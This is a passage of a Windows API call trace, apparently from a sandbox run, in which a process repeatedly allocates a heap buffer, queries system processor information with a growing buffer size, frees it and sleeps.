[0210.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.365] Sleep (dwMilliseconds=0x110) [0210.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.379] Sleep (dwMilliseconds=0x110) [0210.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.391] Sleep (dwMilliseconds=0x110) [0210.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.458] Sleep (dwMilliseconds=0x110) [0210.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.504] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.506] Sleep (dwMilliseconds=0x110) [0210.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.566] Sleep (dwMilliseconds=0x110) [0210.616] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.616] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.617] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.617] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.617] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.617] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.624] Sleep (dwMilliseconds=0x110) [0210.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.646] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.650] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.656] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.656] Sleep (dwMilliseconds=0x110) [0210.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.677] Sleep (dwMilliseconds=0x110) [0210.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.691] Sleep (dwMilliseconds=0x110) [0210.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.713] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.714] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.725] Sleep (dwMilliseconds=0x110) [0210.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.734] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.736] Sleep (dwMilliseconds=0x110) [0210.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.752] Sleep (dwMilliseconds=0x110) [0210.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.771] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.771] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0210.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0210.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.773] Sleep (dwMilliseconds=0x110) [0210.779] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0210.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0210.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0210.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0210.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0210.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0210.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 